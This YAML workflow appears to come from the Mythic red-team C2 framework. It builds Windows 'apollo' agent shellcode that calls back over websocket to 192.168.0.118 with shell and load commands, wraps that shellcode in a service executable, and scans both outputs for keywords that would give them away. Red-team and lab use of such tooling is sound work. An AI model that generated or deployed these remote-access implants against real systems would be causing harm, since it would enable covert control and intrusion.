name: "generate apollo payloads"
description: "Generate shellcode, and service wrapper payloads"
trigger: manual
steps:
  - name: "apollo bin"
    description: "generate shellcode"
    action: "payload_create"
    action_data:
      payload_type: "apollo"
      description: "apollo test payload shellcode"
      selected_os: "Windows"
      build_parameters:
      - name: "output_type"
        value: "Shellcode"
      filename: "apollo.bin"
      c2_profiles:
      - c2_profile: "websocket"
        c2_profile_parameters:
          AESPSK: "aes256_hmac"
          callback_host: "ws://192.168.0.118"
          tasking_type: "Push"
      commands:
      - shell
      - exit
      - load
    outputs:
      PayloadUUID: "uuid"
- name: "bin opsec checker"
    description: "check finished payloads for bad keywords"
    action: "custom_function"
    depends_on:
    - "apollo bin"
    inputs:
      PayloadUUID: "apollo bin.PayloadUUID"
      APIToken: "mythic.apitoken"
    action_data:
      function_name: "opsecStrings"
      container_name: "fileProcessor"
  - name: "conditional checker"
    description: "check for more things"
    action: "conditional_check"
    depends_on:
    - "bin opsec checker"
    inputs:
      APIToken: "mythic.apitoken"
      PayloadUUID: "apollo bin.PayloadUUID"
    action_data:
      function_name: "conditionalService"
      container_name: "fileProcessor"
      steps:
        - "apollo service"
  - name: "apollo service"
    description: "service exe with apollo shellcode"
    action: "payload_create"
    inputs:
      WRAPPER_UUID: "apollo bin.PayloadUUID"
    depends_on:
    - "conditional checker"
    action_data:
      payload_type: "service_wrapper"
      description: "apollo service exe"
      selected_os: "Windows"
      build_parameters:
      - name: "version"
        value: "4.0"
      - name: "arch"
        value: "x64"
      filename: "apollo_service.exe"
      wrapped_payload: WRAPPER_UUID
    outputs:
      PayloadUUID: "uuid"
  - name: "service opsec checker"
    description: "check finished payloads for bad keywords"
    action: "custom_function"
    depends_on:
    - "apollo service"
    inputs:
      APIToken: "mythic.apitoken"
      PayloadUUID: "apollo service.PayloadUUID"
    action_data:
      function_name: "opsecStrings"
      container_name: "fileProcessor"
